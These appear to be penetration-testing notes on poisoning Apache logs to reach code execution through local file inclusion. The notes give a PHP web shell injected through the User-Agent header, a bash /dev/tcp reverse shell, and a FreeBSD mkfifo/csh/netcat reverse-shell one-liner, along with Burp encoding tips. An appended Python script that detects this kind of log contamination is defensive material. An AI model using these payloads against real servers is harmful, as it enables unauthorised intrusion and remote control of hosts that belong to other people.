Apache log

Example from

URL exposing Apache log files:

Error message when contaminating the log with:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");?>

Second try (the error message appeared because the " character could not be processed by the log file). Changing to:

User-Agent: <?php system($_REQUEST['cmd']); ?>

We gain code execution through LFI:

The same request in Burp (useful when log files are full of data)

Gaining a reverse shell from FreeBSD through LFI with:

if [ -e /tmp/OGfWimIImwJMI ];then rm /tmp/OGfWimIImwJMI;fi;mkfifo /tmp/OGfWimIImwJMI;cat /tmp/OGfWimIImwJMI|/bin/csh -i 2>&1|nc 3333 > /tmp/OGfWimIImwJMI
Mind the /bin/csh, as users on this box do not have bash!

Make sure you URL encode the command in Burp before sending:



Shellpop - allowed me to construct the reverse shell for FreeBSD.
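
Detection for the log contamination described above, as an added example that is not part of the original notes: it parses Apache combined-format access log lines and flags PHP open tags in the request, Referer or User-Agent, plus requests whose URL-decoded query points at a log file. The sample lines, the `page` parameter name, the log path and the addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>.*?)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>.*?)" "(?P<agent>.*)"$'
)
# PHP open tags: <?php, <?= and the short form "<? "
PHP_TAG = re.compile(r"<\?(?:php|=|\s)", re.I)
# Request parameters that point at log files (paths are assumptions, adjust per host)
LOG_PATH = re.compile(r"/var/log/|(?:access|error)[._]log", re.I)

# Constructed sample lines: benign, contaminated User-Agent, inclusion of the log
SAMPLE_LOG = r'''
198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; FreeBSD amd64)"
192.0.2.10 - - [12/Mar/2024:10:02:11 +0000] "GET / HTTP/1.1" 200 5120 "-" "<?php system($_REQUEST['cmd']); ?>"
192.0.2.10 - - [12/Mar/2024:10:02:40 +0000] "GET /index.php?page=..%2F..%2Fvar%2Flog%2Fhttpd-access.log HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
'''.strip().splitlines()


def scan_line(line):
    """Return the list of findings for one access-log line."""
    line = line.rstrip("\n")
    m = COMBINED.match(line)
    # Lines that do not parse are scanned whole rather than skipped.
    fields = {k: m[k] for k in ("request", "referer", "agent")} if m else {"raw": line}
    findings = [f"php-tag-in-{name}" for name, value in fields.items()
                if PHP_TAG.search(unquote(value))]
    # Decode twice so double-encoded paths (%252F) are also seen.
    target = fields.get("request", fields.get("raw", ""))
    if LOG_PATH.search(unquote(unquote(target))):
        findings.append("log-path-in-request")
    return findings


def scan_log(lines):
    """Return (line_number, findings) for every line with at least one finding."""
    hits = []
    for number, line in enumerate(lines, start=1):
        findings = scan_line(line)
        if findings:
            hits.append((number, findings))
    return hits


if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(findings)}")
```

A php-tag finding means the log now holds attacker-supplied PHP that any include of that file will execute, so the fix belongs in the include itself (no request-controlled paths) and in log file permissions, not only in alerting.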